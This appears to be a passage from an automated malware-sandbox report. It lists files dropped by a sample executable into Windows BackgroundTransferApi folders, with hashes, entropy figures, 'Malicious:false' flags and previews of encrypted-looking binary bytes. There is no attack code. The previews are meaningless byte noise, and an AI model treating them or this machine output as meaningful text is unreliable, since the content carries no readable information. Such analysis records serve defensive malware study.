                                                                                                                                                                                                    SHA-512:A4D74B90EAD33F97DA71B05AE643025955244DE441418581FCC7B30DCAF1B53DF720050D4CB1A19704D35EF268DA24288075C187D7517FC47FEB9029BEC3BDEF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .K+Kd...F..._..@..|.....uf.W..l.uIH..L..y.@.t.c.vg.k...4(.....S.^.TU.l......*.....\NB...F]54...qg.....q.0.....A..P...m..$......6...(..$..-.f.@.*...1...-......L.61.+\Y.U.%.)6....I.QF.8....F9.{~...v.6.l......o..pd..?R;..fJ.Ai..g......L&.k.R..Q.7.7..,...1..dQ...1..9..A..'..6..]R..9..8`.GY.A....l@.j`.ZpF.:....+<.Ne. M............zrG...lH/.H.p.LS....~v...(w.d................^!...c..B..#...I...4..0....#.....67..'..)..W.Bu..R/...o.dv..X9../...R..vP.....%/..t..:.Y.(p|.8.,.Yc.?8.jb..n2.io....;.s..2C.!.K..N.....z.!.......2.k....bU.H.)`k.@.Nm....KG.4.lGpX{H..{".I.,.w..\....+w....W..".r..Bs....6.R..UG.K.o....R....~....I^}tH..0.T5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\ac5f72b8-b0df-47da-9263-d5c03dade751.011925bc-3b06-469b-b008-94cf78407acd.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                    Entropy (8bit):7.852277776411785
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/jIHLVeISnfTdpOW9cmSDLRrbFL43vCzkk2M67uPqWEFLLMQGd0/VYLIbD:/8HLVbG/91S9bxqK0Bpjw0/vD
                                                                                                                                                                                                    MD5:D5F83EE034AC387252D1BBA3E873DFB9
                                                                                                                                                                                                    SHA1:0FEEAECC88511EDF5B49ABED117A4F5BC7FBCB7D
                                                                                                                                                                                                    SHA-256:BA9E799C0F7EF9C9B1C4DAF959BB339FCE7B5E6BCD7D5172375FB2801DD03039
                                                                                                                                                                                                    SHA-512:AD3820946D2552E61F5A25AF31D3358EDC83625AB57CC004CBC9D41967C84CAD1CC3613307CC10B767BDB4326134473F4092F889D14F148D135EBBE15A8A2226
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..+.*.Tl.s$\.6..<...Y...eB......7dc..N....@..o51.....=I~%n1..f.?.....R[.#KR.%.K..0..>.{.^...m...C..3...gj...e>..'..\.<.<3A..;....2?;.<.......Dh.....">x.P.....>.......#.....5..m+A*.;...0...#h5.y1X.u.V.u...S:...I..f.K....&g..iy..Q._9-.y.gY6....s....PB..<.. 0.7....."..I{....d......%DL.1..=.d..3{B.?.p1w0..m...A.t..oi...%...H.6b......ar.9..q...\.X.........<.`..x..6.i..Ij.._.G.K.....NP)...=..F..`.xm....'...L.v.ZU.N..N.B...>..]..G...._i...?..2q..._...M.<.Na....e.2..h.M.j....$Av+XG...u..xl`%@.n...\z.[1.hKI.z*.F.-...\.9.._.......I....+......L...Z4..@....Vr=...l..GJF.....8?.."..`^..;.>E.V/oi*^.......>...~-...7;>..w.........I......N.#.=.........p......({.tp.......xU,X...8..&V.."c.K.d...1|..X.+..Q.A...=...!.L....x(>..R......[...7..4M.*..{.Bj........P..s..V.F......d....G ...:o.'...H.G.y....r..;+.+....,.-...'.a.y.."..d_F.*.A.....<zH....C:.xqy..uVz....l..&$.u..A....9.S9.....'...O.V>t....-........tR|.....sqM....Z..).....I..#.s....H...P=
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\ac5f72b8-b0df-47da-9263-d5c03dade751.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.718706747968778
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:avOqyt5tXnNGhpYKdCh9rUYxDwPYwDLCGcZGoXYc18CDtXXw0zGQkcii9a:Rqyt59nNAYKChSYxEPR3C9GeDtn1kbD
                                                                                                                                                                                                    MD5:40C2C0C3AA9F32D054EDE0F57BF036B1
                                                                                                                                                                                                    SHA1:1F869EA0E7948CA37EA558903008A363ACC19E4B
                                                                                                                                                                                                    SHA-256:F91349B07CFDA271534089DAA15F931316027A35BBDAC7C687B19FD576FB5CC2
                                                                                                                                                                                                    SHA-512:337B178039C7784E42CD933E7FD6C51D81E86E6F8F20703B8C605EF4B2A6A394CABBD94934D08A6C54C3B8DC831B087AC5AAC1FF9C993CDE370B3BD0E39C2DF4
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: k?.J.....8...v....|8..<..m.eD.:R.*"..~4.....5...?..O`.;..$Ge...w.9..J'D.).G.._.{tn...H.....}.(..n.......%...3.|.=....w...o...M.]..$...+.A..OZ*..)y...L.Pm.....T.......3..!X..|....yx........YC....j......)5....m.u./.|.<........./...2....*:L..OJV......l.7S...g...4.G..s...i.K!...<.....3A.<.`....(Y........@H..Bn...'I..rg.o....xI.V{..z...tqn..".............f....."...".4*j...P.[..6.}.\Y.\#.|.O8...y...I|.C.ip../\.7.....2..M.!..t.@A.P .w.h...rH5.l..R..........WQ..tKu&m>.-.;.........R/Q`_.D...i.....$C.b. ......(.........~...d.C....h.....(kc.${.7d. ;....<*P.#.....Zy.......>c.*...Rj}[`.&2.....Fkz.'..L.5..m..8...3.v..)<{l.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\c4f94572-e797-4003-a61e-fddd78ed67bd.5a97a4e5-8877-4aff-93c1-45f01ac50316.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                    Entropy (8bit):7.861562812795329
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:PlXn0p3m8gCzDoEZjwEs5sY+7Hx2hRXPM/5J7G3I0cGMXm+rVG8aY06DecpbD:P505BzDoQLHYIR2hGza34XpO0eQD
                                                                                                                                                                                                    MD5:3645D72838845048BE49ABA803945988
                                                                                                                                                                                                    SHA1:427E50FAE526C567555F1DBF86C43D4E8B69FB44
                                                                                                                                                                                                    SHA-256:BF147801E60C52BB66A29DAF4896B18543997B673F30AF8BA17A70492A1E89DE
                                                                                                                                                                                                    SHA-512:6976A79419F370211BCC777A4FEABA4EACF067C98387DE8A39C91C5D6D84F7F29D46FBD14726B82BBA83DC427251D6DB53AEAB6CD73C27D66F335A226818ABF6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..I.">./f`.(...t&#*..p.$.b..p...:...T..9X...j......,.j...).H...q.L..f.0d.t...~x.p.....tSb%..ZW..p...NyF................FD..L..^..t.F1k.);.....D..L..8... 2yn.S.SHk>.........3.=<.#2..b.cq...............j.e<:.+ZIMU....-...w..4.Z....W+.....P.."..J.*.l.)....}.....nd.@K..p'i....R...Z.B.....Jl.................S..O..j.$.8.....D...X.o.T...n.1...e%.@ZT......{..%.-.j......M...5.....l..X....^.0.s...Czc.6.P...B^..........O.8..o......{{_.(...n._.r.<.^....g:...[._q.......q.c~.B+@.^...._....c...ZXE/...pI..g.QNL...W..".@....Y....\m"..l. ..U..q&[.a..Q.pu....0{r.<.6.fH...cx.*....v.]........pr.....i..2E|U.-........B...0-...+.u.........,._....A*...,z..W......z.As....#j$.ZXK}...f...{...vv.%...s...j&/B.C.w..h.......ER..q....`.C*.....L..c].H.. .;.t...b.....!....P3.F.......Hg..X.~.;.K.."..*eWc.#......m4-(x\.._n>\2.CH4.\.r..lD..&.S.b.Z.[..H.pL4..1...nxPs|...2.......2..*d,.......Qon..vd=.KP(..(.....;4..<.Nh|..)..v9g...oga.........oJ.`.J/..S.=#p..i......y.%
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\c4f94572-e797-4003-a61e-fddd78ed67bd.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.65034705772064
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:F/2aePzBehsOKBnL/arOw+kADEbTUhVNSviveaTYC4cii9a:Fuae7BIKhYILxvOimzbD
                                                                                                                                                                                                    MD5:DC4C8B64C45C1EE2B90F4CFEFD995BDB
                                                                                                                                                                                                    SHA1:B7B2E5F6F6B2B18C48DFE8C1C86FFD619C396806
                                                                                                                                                                                                    SHA-256:720CC711D2533A3DD8E62DE6021296F351D8B952D5BA6874A57EB8A1430D9AE8
                                                                                                                                                                                                    SHA-512:245E4D5F49F2BCE113A93ED00DC0D8439513EF01FED81E7E7912CE9EBC0F497F63D67747776E18E959D678F70C4F1C8B17FC55559E687ED1204008C0C9C600BE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]H.v...bx..W.s5.....Z.:..-q.....;.7......$'.Q...P!...y..5..xB`n>.<.)......'.!..R...[.o.r.\F.H..\../ .f.......BM.....Enw.i.... ...o...Po.P[].6B-..G.9F.L...u8...@.j.......%:.+.).X......J..n..)...Oo..F..U<...p.v......m...w.@>...&..Ba@,..<..Wz..S.%..][J.......b%-...0..A.+<%. .{..k.As1...Y.T3.P.7|...z..LU...n....R....8Mi.c...q.L..u..&..A.!O..8..X....;.".|..t.R....ix..e....*..D.=..:.....5.D....t5....q...Bt....k.^#r..a._._......0.I.#."...V.*o...d.l.3s.Q.ehL......EV...wkDTs..p..&.....MF.R.]n>.o.}.z>'.)8qO.M......>F.....+.8]. X...U5-..N....^.X.s.z.w...]q.Sc.(.t.--n.(.67..n...BuM..N...:..|.e..KooE .M.Y`.L...(.....]Y.mz...E.B.2g.........R5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\c7297f38-631f-4c3a-9817-9b9bc7836437.0bce4c4f-b61a-4d97-99bb-d15398771bf1.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1423
                                                                                                                                                                                                    Entropy (8bit):7.873142489804381
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:xeOdX8xEcNr8By0f3NEoYwRu4/VgrBAE/Qo0rUql13WpdBLrA/VUpeQHFbD:gcWKysNEwngrGE/5qU0YpdBheiVD
                                                                                                                                                                                                    MD5:26DBBD437CFB83685C24C9177606B1B5
                                                                                                                                                                                                    SHA1:D45C563B6DBF8A0DB020A17DAC01B6D5A76F99EF
                                                                                                                                                                                                    SHA-256:BC01B5ACEF16C1212A09F9F4911375303EC7BFDA762B6CCBC493686DC897AA11
                                                                                                                                                                                                    SHA-512:6B593615C5541DD75241E29BB95CFF6072AC7A0631B889DBA56B726078F0455736084ECDD2606D6BA6C973C4EB1ECA2FE7E947685A6D610DAB87095D5197E6FD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .o...Y.h...Q).V.}.....p.Tm..~.n../...6e.!.d.2..f.S...(y.G.]....|............Ch...U..fj.....XA..i...;.$c...i9&..a..J.O.2`..u..?..Y.....2.+..l!g.6...q.H. .&.....u..x.^~..u..,. ..$.......c.w.%cP.A!{...$..w\D;2._:....R~$....".qjy.{.{...:.....3..6.^..`4.;.1...2.+...\..91...H9h3.<.......P..y.Aj..z.|..>Nb..n^VE$2..........#..pd.`....F.2....C..24;`.*I....X.+.@.vY..3Ar.|b>.e...lwf/.'~.s..@G..(.p..p?r].~...{<...I....t..30.|kZ.'7..X.......0z....I....c.hF+<.=m...r......$0.........z..L{....W.MO..zPk..5.e.R.}.'..:........=.[,.$..a...\J......\.=[.#C.. km5..~(Y.n....Ik.e...#{.9.=.syB.e..s*\.C...z.........."..s..z":.S.......V;..c..Y......9h..Vw.g.R5.2..I.N...Dq...M+.....:..!..3?*X.F....p.z..m.%.4.SAK.O%..+.0..E..9".P...y.....n%J..l..s..h.....o.^./.x.x...B.."...!...Q.....2....!..)..&Y{,.UX.$I1M.d.t.W&0_."...W.....fI8..dv.Tl}......k.t.;L.<._..n.q..U1o../.+.....s..........4...K.C...@Mexo.=}y.n..da.L....x.;G..[U.nKW_T....Ax..!:+.&...n..F.On...5...kR.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\c7297f38-631f-4c3a-9817-9b9bc7836437.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):737
                                                                                                                                                                                                    Entropy (8bit):7.696148107952171
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:vCdegz2qzFO6WoTUrh1CUp1shFwA69ZLtAyzAZf8znux0p5d+chQkYeVjncii9a:vCdegzzAoTSzXqFwAEttyxx+5d+ch59X
                                                                                                                                                                                                    MD5:14223864842F0E6FE5AEC55851EF567A
                                                                                                                                                                                                    SHA1:4AB1E591E1852E7D477E76FEC8A08E36A3B48CC2
                                                                                                                                                                                                    SHA-256:9CB7C2177D17933E31FCBAA67B06335455351E60B1D42617255828A27CE4B0D5
                                                                                                                                                                                                    SHA-512:AA865F2AC186EBD32458E1E78EFF1ECB8F7F7878A077A0F105B26E084E7493CB883D2ECB569F410772AC5611A7A02116FB195564F5E6FC94194E12BC38D06EA8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Y.(.2..M9p....B..wU.@.....0M7.).].G5...&d..g:...%...o../k"..V.{..7. .G3,.U.|..Wq;J<....v.9..O{...V..<+......t_.{...}..-@0...R.o......R.@..t...]2..({..Q........]{.C-....:A...X.S..."..a. .e;......`...nu>a..c..UP.H....9,.'..KE..&......e.Y.D...yw.8(.. ..X._'7..C,c."A6:bR..l..q.....$B\..l..*....3...~1+..1.Q.,....}..b!.RU>.....T....~.'..JY?.m#..^.Fn...usf... Z.3&..14Z..;h.0...x.^F.....Tt>..2...&?X...Ks:..X.3......@>......z....(.k........P;..a.;....6X.....|..Vc...vs.......iB.K.?.yL.*Z6.....o......5Lb......S,.W....22y.fx...8;..%.u,\..#...8aO\..g:U.L.A...uu....G...K.....sCE]-c.E._..eoJ.P|...+.2z.{.....`.....T.....#9t 5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\c9d6487e-0919-4772-bf01-57444410a87a.fc085919-8d66-487d-8f3c-77319df124ac.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1427
                                                                                                                                                                                                    Entropy (8bit):7.860326528917465
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:6X+Nee5oC+I75UkJ4M7/+dUvjDowAAS8GCvx6GONZDTosYumNHPnRsLMLPbD:8+3+I1/WCZrMAhGAQvFEsYumNHPnRsL2
                                                                                                                                                                                                    MD5:7090D1A234CFF679922F69D8FA5FDEDD
                                                                                                                                                                                                    SHA1:C56E5A7D2F9AC1E46D37CE02D9A95C2234FDCB35
                                                                                                                                                                                                    SHA-256:02B221FCFA6D62B101266B7B13555886E6A7CF0FBEDE56369ED8C6C233CABAEA
                                                                                                                                                                                                    SHA-512:7E427C8DA2B37987A2E767FD5DA134FCBF2586F8CFC1D8AA5F3D23484D4C1E3D3B20FEA9523C940223AD504E1C25C156F642D667529F5291CB168338694AC664
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .Mt!.W..j......y.z..f}na.s!.+3*.r.......xB...*.:z...u.)?...qk.y..IH8......k+1..?[.V...7..}...M.Q.9..~..]....#....0.....aT$.1{.n..p..r.:.%^9..].S..ZX3.....8.....eqz.......O.b..@...p.(m.|.....)^.}.@R;d[.b... ....<...$v...`.[.-... ~B.....l8..........._O...f... v..._x.s$..j6.CF..8..uO...@...<f.Sd. ......+..$!^.....I......sX$..{...=/VbE..-..u.-3m..[.ss...]lky...y..\......m0o.j...=....k.....Fnx..V^;aD.........l...(z.ev....;..=..-....o...j.2^.'..#...cM..D3_....8.+.#.=0.xh....3.k...!M...c.x..R..i...Dc]T.0...L.6.........#Q.F.$.3..>.|y...~...d..F.H.D.D..O.y.^...d..#....oj..~.W]'.....`h...n...C?2.....`. ..XU..j.'..X..."..(+...... .#....g.*...Z. d..@#e..........cXJ..VsN....wF.n./..t,..V.>2.Nc.p)y.|.F.1..U.H../....O&p~..7".s...ZN.......*{.%..mU..J...)>kj..*F...*..4;".i.. ...K...u.e..a..3 ..hHF..z"g5k".../A./t.N...U..$.R+.k..^.?...BV......4e..C.D....`.H.Xf...}].....q....=..~...X?.V.........p...... q.&.z`I..b.\.o..X......{...b...N.....4xT..<c^.kh..$.xH
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\c9d6487e-0919-4772-bf01-57444410a87a.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):737
                                                                                                                                                                                                    Entropy (8bit):7.651377891584516
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:K0KT2hZ6UziYgnMAOM2c8VOb0B4SPw6Hwi7jBxNnuR6dzEWKwcii9a:dK6Z6Uzi5nzO0UD4Uw6Qi7jBxxI6NJbD
                                                                                                                                                                                                    MD5:F99EE462B7007F6A0AF787C1E2558230
                                                                                                                                                                                                    SHA1:083FABC4F0B145751968A5655B385BFCCA03625F
                                                                                                                                                                                                    SHA-256:773CF2CD033C7994E458F02F6E170B49D6811588A637F4BE48669206C70CA1AD
                                                                                                                                                                                                    SHA-512:B560FB7F17D623773F0D1391E04FEA3ED7E6EA0D01F614E34951304AF9DB1A185A95414811299F8F8616473BA837429CC1DC60B38CF258F9F75072C20E5B0E2A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....H.3j...SP.[.......d.....'......s...&.*.8...!'...1..;o<**.=..+..]&.]~...<.V.`....{..._D..xUV..*S.1...\2.SV.......~g....p......w6Sc.^..1..Z...]_...O.T........1&w.|.6.%U.o|0.T5.)....gL......91+..a....C.5.\he:.....I......t..-..d ....$....U...7.....FVC.....=.9.;.e-.Jf.U.......A..C._[..?k..4...=u.....%.u...k...m@C.l.LO..l.1vC..6.x%..T..4K.,.......c.4n.I.........>.?3.CT...t.j.@@._.a^.f..AEd=.Ie.4eKQ.I.....|.8....~0..j.....M[,....$.WL-.s3.B.m...5=...T.,...H{.dy.5wNLA....o|U...M....KRc.B...........jt.z.j_ c....LGIgC"K..Tv.W.....5....2.k.N..".2....\C...q!A..s.....$.4...]{V6.....k.r.u0..^?.2...p.....%..J...l..u.;...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\cfb71db4-4062-46ce-ba90-5f34b4e868ce.733bf71c-4300-422d-8c6a-1e2740b330fc.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1423
                                                                                                                                                                                                    Entropy (8bit):7.845575373140113
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:AUvIkMBkuB/hb4CNOhqpO4yD8EpJ/DzT05Ed7BbD:bv7Gkuxghq413D
                                                                                                                                                                                                    MD5:7A22DB7DB16741D03D6EAF26B0AAC82D
                                                                                                                                                                                                    SHA1:D0A9908D4675A14B65F62A054CEFC6E1D77D558E
                                                                                                                                                                                                    SHA-256:96B3B5F0F19A82665197E67706CC97F5F7E3F94E65BEF7AC332992D70EF836F5
                                                                                                                                                                                                    SHA-512:5A9AC6F872F3A5235A0B488EEFA5D8C2B52776713CDF98BCB0786116243F1158CD7FA1BEDCA1E826658EB9C94BB9FECAE32036E53ADD8405A654C131D12F010E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: @.`._......#.R..sf....T....|...&....... 6...Z....L......fk.5.........A...........D.M..~.....}j.B.p].(.w......^9...7B..*..?,c.F....D...o..%N....\-...$...k..~..*.....C\z.........'.*.{..[\...Jn..W..g.P..Nf.M\..s...s..//..To....7....ji..%b../..W...K.O~..7,..R.h....7..7R.k.....,.N]....k-2:X......{.L.w(.{....O...8t..3.dw<@...d-P....1..7.J..n%#'.cRP...O.3&...i...........O:-.....'.....{X....J..`..6.j".@..W..;z..G.*.Am)....\..^ENd..f..|h]...]...`....z..v .....=.R..&...!....!...\.-..B.."..o.A...=..h.V.&.Pf|..v..S.O.H/..K...ov..o.L....A..Z.!../...Y.W.$../RNrCa.N.Af.wrR.....,..V..-.Mrv...a..R4P ..wo...e...O.e.y%.hON...qp....*..D......j...*.{...x.zg.g.-.Zf..u....w.q..~._.U|.........,;........X.L.cX&.4Z.......tx..E5l.a.4j.8M...].....$.5s...Jl.....~T....Z........]...Y%......oMC..............f.......@...[........k.J.u...ku.?..le.....:$s..2j...[7&9.e..(N.v..1%9.........!3.#....6......i..@..9'.WI.y..t....$..."M.0.....^.....d..b8.w.5.:....7E.)....*..R..6fV
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\cfb71db4-4062-46ce-ba90-5f34b4e868ce.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.667391873281741
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:4WyDivR/k3RWqj8C29IhA45MN9yYux7075TYqkQE8NIso3JJeyXq+q2K4UACFfXs:byDkEW1Hqhd5ZYM07pYq6oYZq+bC5X6H
                                                                                                                                                                                                    MD5:863C0636D6BA89ABD60F14A36C28FA93
                                                                                                                                                                                                    SHA1:CF868E1F9C843E1B1BC5DA192FF4EE944B1BA0C0
                                                                                                                                                                                                    SHA-256:AC75D4A9C73661CFCE3158360461C12829C9802B28DC890655F070DEA73E5823
                                                                                                                                                                                                    SHA-512:254882B55E2DE87549A0023FBD916279E8E1BA4391D1C8887886B9AD2A555865C5F65FC0A805E3B756D6BE285DB4199E92AA65F994C2BEA10F3207CAF0654116
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...vb@...M.At....7..?P....e.L.../......+.....[$..AX,Q.+.._|7$|.-I...kfl..G.Pgm...3......7o.._P..ONZa.B...L..WC...!..=...F....c..K.:.....P.f....."..s.|\.0e[.N9#&.CBpO+J..3.....*..../.L..{b..G....5(.)%..G..9...C......u.yY...l3....U.~.W.F.U.@D..W..@.^...%.#...~).7L$.4.;..I......!}.:?J.E......d.......2.()....O>Q7.X....o..y....g..;..oP..}.U...#g..Q. q.N..,....P..4..L......g...=."O.~......qJ.....#V...dD.....+..&...c..$y.t.d& 7.."t...._..S.89...LF.....w...?...N>...n.J.......o..c.to.E.:.!74....D..E..p.C...."4.A..kSz.../...[...BT....{;A5.E>......v.k.P.f..&.....d&R...{b..k..w.SR.z..}.Z..Zc... .5....ue..=..u.C.\e-....1T......[5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\d77fd2e0-b707-40ea-aa40-dbe08e51effd.23d1e83d-a256-41d9-ad70-ffc44eb9a628.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                    Entropy (8bit):7.857059416388422
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/z8SjPx2poGQVXeGS0lhnO8xU0BhcEYZq9o3Yqb3nKF0DmlXWAAcXdkQvSSobD:4SjPxcUVXeGS65dU07TYoo37XpDwXWAY
                                                                                                                                                                                                    MD5:55E91C783C516E3103355B5D7CF47E88
                                                                                                                                                                                                    SHA1:43A209AA0E6DB6EBEEB10D72BDA24F2812F3AACF
                                                                                                                                                                                                    SHA-256:790F554EF9293A58F6F793145ECC2F3D2C5E372CAC838CD187F1EBE546DA1388
                                                                                                                                                                                                    SHA-512:195274D91770C8437954D4DE06C3F8D5390C00E25B13EF1EC1CD0542E0CE57E467F377AF9F82A2CC251258ADA14ADD880D075B19FFFF2F2D2D84EB8571C1570A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .W.Z.......y....C-...a.....*..2.-.........T..8.....=..w]...$_....w.....$..SC-..A4.-..4..b*.A..Cv.>...uI.0Y:=...e.>.V.G.f.....6.,m-..g..c.;....W..G.=0B..D..=./.q`...y7.d.*.ON(...`S.a....,..Q<M.jh....~...s...SDD.....{..b.....e7w.......\O....g.z.rj.@Y.I..8...tm.Y..x....&...`.AOZA....MZ.m5....P.......<.;..Yr.shs#).%...T.....F.eu.....O....y8.&7&*.Qb ..[b..v.....if...&....V`.L.:....P..e.J.../j...S............|.....D.8......=...y......E(.`s..d4..FW..r.iwt_.l...^.?.6..p.R.F\E.K.;....b...^..1.H..k..Q..}..A...]..B.......Q...3Z'.<"b..V.J. WE$r.5a~..s.B..z5&..EX..N...5.h.....%7.5.&](.C.!...*...t......I..-r13c`.H..Q.G[S.....m..I..(....h;....C.rI..M....3-.GhQ...(....l .7.'....V..u..88o.2?.#....YO.0.{..4.V1..=.... !tR..W.l]&...C7...../.z?.!..b.....s.#..p.v.....+".oF.sr..l..]9N..Cy..;."p>...d.......rP.%y7...V.Zqn...Q.k...P..Vz...hq.7.;..}..4".F..t...`......._9t..\G+.$....5....Q..v..<..X....G.....*...)...E..........h5mb......0..7C@......3)9..y......M~...0
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\d77fd2e0-b707-40ea-aa40-dbe08e51effd.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.711725601581792
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:2XKrIgwy5Z6RPKunxeWdJvgbeWeeplx8OdoXDwcnDhvjFSJGrrr9U5yBXcii9a:EKrIgwy+sWTvg4eDxIX3hbzrrZU5aXbD
                                                                                                                                                                                                    MD5:80A8EAA9F0A9BAC3BAE5D26F9A98365C
                                                                                                                                                                                                    SHA1:2F7234A26CB448A874C451B663D95CF126CD6898
